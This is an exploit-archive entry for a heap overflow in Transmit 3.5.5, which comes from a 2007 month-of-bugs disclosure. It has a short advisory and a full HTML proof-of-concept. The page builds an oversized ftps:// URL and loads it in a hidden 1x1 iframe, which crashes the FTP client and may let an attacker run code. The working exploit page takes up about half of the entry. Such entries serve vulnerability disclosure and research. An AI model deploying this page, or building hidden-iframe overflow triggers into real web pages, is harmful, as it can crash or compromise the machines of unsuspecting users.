Transmit 3.5.5 - Remote Heap Overflow

Author: LMH
type: dos
platform: multiple
port: 
date_added: 2007-01-20  
date_updated: 2013-11-08  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29502.html  
source: https://www.securityfocus.com/bid/22145/info

Transmit 3 is prone to a heap-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.

An attacker could leverage this issue to have arbitrary code execute with administrative privileges. A successful exploit could result in the complete compromise of the affected system.

Transmit 3 version 3.5.5 and prior are reported vulnerable.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-19-01-2007</title>
		<script>
			function boom() {
			    var recipient = document.getElementById('testbox');
				var str = '';
				for (var i = 0; i < 408; i++) {
				    str = str + 'A'
				}
				str = str + 'ABCD';

				alert('Payload size: ' + str.length);

				str = "ftps://" + str;
				ftarget = document.createElement('iframe');
				ftarget.src = str;
				ftarget.width = 1;
				ftarget.height = 1;
				recipient.appendChild(ftarget);
			}
		</script>
	</head>
	<body>
	    <div id="testbox" style="display: none;"></div>
		<input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />

	</body>
</html>